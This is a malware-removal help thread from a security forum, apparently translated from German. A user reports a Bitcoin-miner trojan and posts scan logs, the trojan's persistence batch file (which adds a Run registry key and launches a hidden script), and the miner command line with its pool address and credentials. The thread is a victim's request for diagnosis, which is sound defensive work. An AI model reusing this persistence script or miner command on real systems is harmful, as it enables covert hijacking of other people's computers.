Log analysis and evaluation: Trojan.Bitminer "C:\Users\***\AppData\Roaming\pejo\scvhost.exe" (Windows 7)
04.06.2013, 16:28 | #1 |
Trojan.Bitminer "C:\Users\***\AppData\Roaming\pejo\scvhost.exe"

Hello,

I first noticed that something might be wrong when, after starting Windows 7, a DOS window appeared with the title bar "C:\Windows\system32\cmd.exe" and, as the only line in the window, "Der Vorgang wurde erfolgreich ausgeführt".

Malwarebytes Anti-Malware then found the following file to be infected and quarantined it: "C:\Users\***\AppData\Roaming\pejo\scvhost.exe"

Here is the log from the quick scan that produced this result:
Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Datenbank Version: 913060202

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

02.06.2013 14:56:57
mbam-log-2013-06-02 (14-56-57).txt

Art des Suchlaufs: Quick-Scan
Durchsuchte Objekte: 220542
Laufzeit: 7 Minute(n), 40 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 1

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
c:\Users\ant\AppData\Roaming\pejo\scvhost.exe (Trojan.BitMiner) -> Quarantined and deleted successfully.

A full scan with Malwarebytes, however, no longer found anything:
Code:
Malwarebytes' Anti-Malware 1.51.2.1300
www.malwarebytes.org

Datenbank Version: 913060202

Windows 6.0.6002 Service Pack 2
Internet Explorer 9.0.8112.16421

02.06.2013 16:45:22
mbam-log-2013-06-02 (16-45-22).txt

Art des Suchlaufs: Vollständiger Suchlauf (C:\|)
Durchsuchte Objekte: 358343
Laufzeit: 1 Stunde(n), 21 Minute(n), 45 Sekunde(n)

Infizierte Speicherprozesse: 0
Infizierte Speichermodule: 0
Infizierte Registrierungsschlüssel: 0
Infizierte Registrierungswerte: 0
Infizierte Dateiobjekte der Registrierung: 0
Infizierte Verzeichnisse: 0
Infizierte Dateien: 0

Infizierte Speicherprozesse:
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel:
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungswerte:
(Keine bösartigen Objekte gefunden)

Infizierte Dateiobjekte der Registrierung:
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse:
(Keine bösartigen Objekte gefunden)

Infizierte Dateien:
(Keine bösartigen Objekte gefunden)

*\pejo\vifier.bat:
Code:
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v pejo /d "\"%appdata%\pejo\vifier.bat\"" /f
cd "%appdata%\pejo\"
chp cmd /c ""%appdata%\pejo\1.bat""

Code:
scvhost.exe -o hxxp://us1.eclipsemc.com:8337 -u melody_6 -p pavlaka -k diablo

Since the infected scvhost.exe is mentioned in 1.bat, I now assume that this pejo directory has something to do with the whole thing...

Here is the list of files in the directory:
Code:
1.bat
API.class
chp.exe
diablo121016.cl
diakgcn121016.cl
libblkmaker-jansson-0.1-0.dll
libblkmaker-0.1-0.dll
libcurl-4.dll
libjansson-4.dll
libusb-1.0.dll
miner.php
pdcurses.dll
phatk121016.cl
poclbm121016.cl
pthreadGC2.dll
scrypt121016.cl
vifier.bat
zlib1.dll

defogger:
Code:
defogger_disable by jpshortstuff (23.02.10.1)
Log created at 17:09 on 02/06/2013 (***)

Checking for autostart values...
HKCU\~\Run values retrieved.
HKLM\~\Run values retrieved.

Checking for services/drivers...
Unable to read sptd.sys
SPTD -> Disabled (Service running -> reboot required)

-=E.O.F=-

Code:
OTL logfile created on: 02.06.2013 17:24:00 - Run 1 OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ant\Desktop Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation Internet Explorer (Version = 9.0.8112.16421) Locale: 00000407 | Country: Deutschland | Language: DEU | Date Format: dd.MM.yyyy 3,00 Gb Total Physical Memory | 1,99 Gb Available Physical Memory | 66,28% Memory free 6,19 Gb Paging File | 5,21 Gb Available in Paging File | 84,05% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 111,57 Gb Total Space | 15,15 Gb Free Space | 13,58% Space Free | Partition Type: NTFS Drive D: | 111,55 Gb Total Space | 35,46 Gb Free Space | 31,79% Space Free | Partition Type: NTFS Drive G: | 1,86 Gb Total Space | 0,02 Gb Free Space | 1,00% Space Free | Partition Type: FAT Computer Name: ANT-PC | User Name: ant | Logged in as Administrator. Boot Mode: Normal | Scan Mode: Current user | Quick Scan Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days ========== Processes (SafeList) ========== PRC - [2013.06.02 17:02:10 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ant\Desktop\OTL.exe PRC - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) -- C:\Program Files\NetDrive\ndsvc.exe PRC - [2012.08.01 10:23:39 | 000,348,664 | ---- | M] (Avira Operations GmbH & Co. 
KG) -- C:\Program Files\Avira\AntiVir Desktop\avgnt.exe PRC - [2012.07.09 20:51:26 | 001,672,008 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyserver.exe PRC - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe PRC - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe PRC - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe PRC - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\sched.exe PRC - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe PRC - [2012.05.09 07:18:42 | 000,080,336 | ---- | M] (Avira Operations GmbH & Co. KG) -- C:\Program Files\Avira\AntiVir Desktop\avshadow.exe PRC - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe PRC - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE PRC - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe PRC - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe PRC - [2009.04.11 08:27:36 | 002,926,592 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe PRC - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) 
-- C:\Acer\Empowering Technology\eNet\eNet Service.exe PRC - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe PRC - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () -- C:\Acer\Mobility Center\MobilityService.exe PRC - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe PRC - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe PRC - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe PRC - [2007.09.07 21:35:10 | 000,102,400 | ---- | M] (Synaptics, Inc.) -- C:\Program Files\Synaptics\SynTP\SynTPStart.exe ========== Modules (No Company Name) ========== MOD - [2011.06.24 22:56:36 | 000,087,328 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll MOD - [2011.06.24 22:56:14 | 001,241,888 | ---- | M] () -- C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll MOD - [2010.03.15 11:28:22 | 000,141,824 | ---- | M] () -- C:\Program Files\WinRAR\RarExt.dll MOD - [2008.03.10 08:01:06 | 000,159,744 | ---- | M] () -- C:\Windows\System32\atitmmxx.dll ========== Services (SafeList) ========== SRV - [2013.05.14 21:03:15 | 000,256,904 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc) SRV - [2013.03.06 15:43:20 | 002,088,960 | ---- | M] (Bdrive Inc.) 
[Auto | Running] -- C:\Program Files\NetDrive\ndsvc.exe -- (ndsvc) SRV - [2012.07.13 13:28:36 | 000,160,944 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate) SRV - [2012.07.09 20:51:02 | 000,545,608 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkyproxy.exe -- (TwonkyProxy) SRV - [2012.07.09 20:50:58 | 000,271,176 | ---- | M] () [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkywebdav.exe -- (TwonkyWebDav) SRV - [2012.07.09 20:50:56 | 000,549,704 | ---- | M] (PacketVideo) [Auto | Running] -- C:\Program Files\Twonky\TwonkyServer\twonkystarter.exe -- (TwonkyServer) SRV - [2012.05.09 07:18:43 | 000,086,224 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\sched.exe -- (AntiVirSchedulerService) SRV - [2012.05.09 07:18:42 | 000,110,032 | ---- | M] (Avira Operations GmbH & Co. KG) [Auto | Running] -- C:\Program Files\Avira\AntiVir Desktop\avguard.exe -- (AntiVirService) SRV - [2011.08.31 17:00:48 | 000,366,152 | ---- | M] (Malwarebytes Corporation) [Auto | Running] -- C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService) SRV - [2011.08.13 01:56:34 | 000,411,432 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files\Common Files\Steam\SteamService.exe -- (Steam Client Service) SRV - [2011.02.28 19:44:14 | 000,183,560 | ---- | M] (Microsoft Corporation.) [On_Demand | Stopped] -- C:\Program Files\Microsoft\BingBar\BBSvc.EXE -- (BBSvc) SRV - [2011.02.25 11:46:22 | 000,249,648 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft\BingBar\SeaPort.EXE -- (SeaPort) SRV - [2011.01.26 18:00:16 | 000,284,672 | ---- | M] (Advanced Micro Devices, Inc.) 
[Auto | Stopped] -- C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe -- (AMD FUEL Service) SRV - [2010.06.17 05:23:34 | 000,140,224 | ---- | M] (Advanced Micro Devices) [Auto | Running] -- C:\Program Files\ATI Technologies\ATI.ACE\Reservation Manager\AMD Reservation Manager.exe -- (AMD Reservation Manager) SRV - [2009.10.09 13:11:19 | 000,389,120 | R--- | M] () [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerScheduleService.exe -- (AVerScheduleService) SRV - [2009.04.08 13:49:30 | 000,344,064 | R--- | M] (AVerMedia) [Auto | Running] -- C:\Program Files\Common Files\AVerMedia\Service\AVerRemote.exe -- (AVerRemote) SRV - [2008.06.10 18:40:06 | 000,131,072 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eNet\eNet Service.exe -- (eNet Service) SRV - [2008.01.21 04:23:32 | 000,272,952 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008.01.03 02:55:52 | 000,506,416 | ---- | M] (Egis Incorporated) [Auto | Running] -- C:\Acer\Empowering Technology\eDataSecurity\x86\eDSService.exe -- (eDataSecurity Service) SRV - [2007.12.19 19:09:22 | 000,024,576 | ---- | M] () [Auto | Stopped] -- C:\Acer\Empowering Technology\eSettings\Service\capuserv.exe -- (eSettingsService) SRV - [2007.11.27 19:54:36 | 000,110,592 | ---- | M] () [Auto | Running] -- C:\Acer\Mobility Center\MobilityService.exe -- (MobilityService) SRV - [2007.10.01 17:42:36 | 000,024,576 | ---- | M] (Acer Inc.) [Auto | Running] -- C:\Acer\Empowering Technology\eLock\Service\eLockServ.exe -- (eLockService) SRV - [2007.09.20 14:57:28 | 000,167,936 | ---- | M] (acer) [Auto | Running] -- C:\Acer\Empowering Technology\ePower\ePowerSvc.exe -- (WMIService) SRV - [2007.09.10 16:28:18 | 000,057,344 | ---- | M] (Acer Inc.) 
[Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\eRecoveryService.exe -- (eRecoveryService) ========== Driver Services (SafeList) ========== DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkfwd.sys -- (NwlnkFwd) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\nwlnkflt.sys -- (NwlnkFlt) DRV - File not found [Kernel | On_Demand | Stopped] -- system32\DRIVERS\ipinip.sys -- (IpInIp) DRV - [2013.03.06 15:43:15 | 000,048,352 | ---- | M] (Bdrive Inc.) [File_System | On_Demand | Running] -- C:\Program Files\NetDrive\NDFS.sys -- (ndfs) DRV - [2012.09.19 11:02:06 | 000,181,344 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudmdm.sys -- (ssudmdm) DRV - [2012.07.30 13:32:08 | 000,083,168 | ---- | M] (DEVGURU Co., LTD.(www.devguru.co.kr)) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ssudbus.sys -- (dg_ssudbus) DRV - [2012.05.09 07:18:43 | 000,137,928 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avipbb.sys -- (avipbb) DRV - [2012.05.09 07:18:43 | 000,083,392 | ---- | M] (Avira GmbH) [File_System | Auto | Running] -- C:\Windows\System32\drivers\avgntflt.sys -- (avgntflt) DRV - [2011.10.19 17:56:15 | 000,036,000 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\avkmgr.sys -- (avkmgr) DRV - [2011.08.31 17:00:50 | 000,022,216 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Running] -- C:\Windows\System32\drivers\mbam.sys -- (MBAMProtector) DRV - [2010.11.21 17:30:51 | 000,691,696 | ---- | M] (Duplex Secure Ltd.) 
[Kernel | Disabled | Stopped] -- C:\Windows\System32\drivers\sptd.sys -- (sptd) DRV - [2010.06.17 16:14:27 | 000,028,520 | ---- | M] (Avira GmbH) [Kernel | System | Running] -- C:\Windows\System32\drivers\ssmdrv.sys -- (ssmdrv) DRV - [2010.02.18 09:18:22 | 000,037,944 | ---- | M] (Advanced Micro Devices) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\amdiox86.sys -- (amdiox86) DRV - [2009.10.19 04:26:08 | 000,474,880 | ---- | M] (AVerMedia TECHNOLOGIES, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\AVerAF35.sys -- (AVerAF35) DRV - [2008.11.19 17:09:08 | 000,013,056 | ---- | M] (LG Electronics Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\lgusbbus.sys -- (usbbus) DRV - [2008.03.10 08:58:40 | 003,533,824 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag) DRV - [2008.01.21 04:23:21 | 000,016,896 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\WSDPrint.sys -- (WSDPrintDevice) DRV - [2007.07.03 11:05:20 | 000,015,392 | ---- | M] (Acer, Inc.) [Kernel | Auto | Running] -- C:\Acer\Empowering Technology\eRecovery\int15.sys -- (int15) DRV - [2007.04.03 20:04:28 | 000,039,680 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2media.sys -- (O2MDRDR) DRV - [2007.04.03 02:11:08 | 000,035,712 | ---- | M] (O2Micro ) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\o2sd.sys -- (O2SDRDR) DRV - [2006.11.29 02:44:52 | 000,008,192 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2006.10.30 21:23:12 | 000,007,680 | ---- | M] (ATI Technologies Inc.) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\AtiPcie.sys -- (AtiPcie) DRV - [2006.04.07 17:06:38 | 000,038,496 | ---- | M] (OLYMPUS IMAGING CORP.) 
[Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VNUSB.sys -- (VNUSB) DRV - [2005.10.31 12:28:04 | 000,015,616 | ---- | M] (WideView Technology Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ECS_Loader_220.sys -- (ECS_Loader_220) ========== Standard Registry (SafeList) ========== ========== Internet Explorer ========== IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520 IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&s=2&o=vp32&d=0309&m=travelmate_5520 IE - HKLM\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64} IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC IE - HKLM\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://go.web.de/home IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://go.web.de/tab2 [binary data] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,SearchDefaultBranded = 1 IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.de/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 33 0B F0 16 3E C2 CA 01 [binary data] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\..\SearchScopes,DefaultScope = {67A2568C-7A0A-4EED-AECC-B5405DE63B64} IE - 
HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC IE - HKCU\..\SearchScopes\{111F1281-BDAA-4B8D-9AF9-8BB376A8BDED}: "URL" = hxxp://www.bing.com/search?FORM=IEFM1&q={searchTerms}&src={referrer:source?} IE - HKCU\..\SearchScopes\{4A9BB00F-DA96-4E4D-A9CF-45117AB9D4D2}: "URL" = hxxp://go.web.de/suchbox/smartshopping/?searchText={searchTerms}&mc=searchplugin@suche@msie.suche@preisvergleich IE - HKCU\..\SearchScopes\{66227E65-9D58-4B37-87EC-09E6BF4C24AB}: "URL" = hxxp://go.web.de/suchbox/ebay?query={searchTerms} IE - HKCU\..\SearchScopes\{67A2568C-7A0A-4EED-AECC-B5405DE63B64}: "URL" = hxxp://go.web.de/suchbox/google?q={searchTerms}&rlz=1I7ADRA_de IE - HKCU\..\SearchScopes\{84EE36C5-9201-46D0-A633-5CFCE7FF6552}: "URL" = hxxp://suche.gmx.net/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin IE - HKCU\..\SearchScopes\{96C8FC5C-438D-405E-BC5E-8F7F45AA3BCA}: "URL" = hxxp://go.1und1.de/suchbox/amazon?tag=1und1icon-21&field-keywords={searchTerms} IE - HKCU\..\SearchScopes\{ADDF20CC-BACE-48CB-A300-6C29BFE0E987}: "URL" = hxxp://suche.web.de/search/web/?su={searchTerms}&mc=searchplugin@suche@msie.suche@web&origin=searchplugin IE - HKCU\..\SearchScopes\{C1BF8F08-E17F-4955-840D-D97E1187C1D3}: "URL" = hxxp://de.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&type=971163&p={searchTerms} IE - HKCU\..\SearchScopes\{C821A797-ED91-43F3-A1FF-3BE6E0F679A4}: "URL" = hxxp://go.1und1.de/suchbox/1und1suche?su={searchTerms} IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local> ========== FireFox ========== FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll () FF - 
HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX,Inc.) FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin: C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeLive,version=1.5: C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.) FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.) FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Components: C:\Program Files\Mozilla Thunderbird\components [2012.05.21 20:28:48 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Thunderbird 2.0.0.24\extensions\\Plugins: C:\Program Files\Mozilla Thunderbird\plugins [2013.05.19 09:30:22 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\eplgTb@eset.com: C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{8A9386B4-E958-4c4c-ADF4-8F26DB3E4829}: C:\Program Files\PriceGong\2.6.11\FF [2013.05.15 20:53:03 | 000,000,000 | ---D | M] ========== Chrome ========== CHR - homepage: hxxp://www.google.com/ CHR - default_search_provider: Google (Enabled) CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding} CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms} CHR - homepage: hxxp://www.google.com/ CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\PepperFlash\pepflashplayer.dll CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\gcswf32.dll CHR - plugin: Remoting Viewer (Enabled) = internal-remoting-viewer CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\ppGoogleNaClPluginChrome.dll CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\21.0.1180.89\pdf.dll CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll CHR - plugin: Java Deployment Toolkit 6.0.210.7 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npdeployJava1.dll CHR - 
plugin: Java(TM) Platform SE 6 U21 (Enabled) = C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll CHR - plugin: QuickTime Plug-in 7.7.2 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL CHR - plugin: Microsoft Office Live Plug-in for Firefox (Enabled) = C:\Program Files\Microsoft\Office Live\npOLW.dll CHR - plugin: DivX Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll CHR - plugin: Picasa (Enabled) = C:\Program Files\Google\Picasa3\npPicasa3.dll CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll CHR - plugin: Windows Presentation Foundation (Enabled) = C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll O1 HOSTS File: ([2006.09.18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found. 
O2 - BHO: (PriceGong - Price Comparison) - {1631550F-191D-4826-B069-D9439253D926} - C:\Program Files\PriceGong\2.6.11\PriceGongIE.dll (PriceGong) O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found. O2 - BHO: (ShowBarObj Class) - {83A2F9B1-01A2-4AA5-87D1-45B6B8505E96} - C:\Acer\Empowering Technology\eDataSecurity\x86\ActiveToolBand.dll (HiTRUST) O2 - BHO: (Partner BHO Class) - {83FF80F4-8C74-4b80-B5BA-C8DDD434E5C4} - C:\ProgramData\Partner\partner.dll (Google Inc.) O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.) O3 - HKLM\..\Toolbar: (no name) - {0BF43445-2F28-4351-9252-17FE6E806AA0} - No CLSID value found. O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - 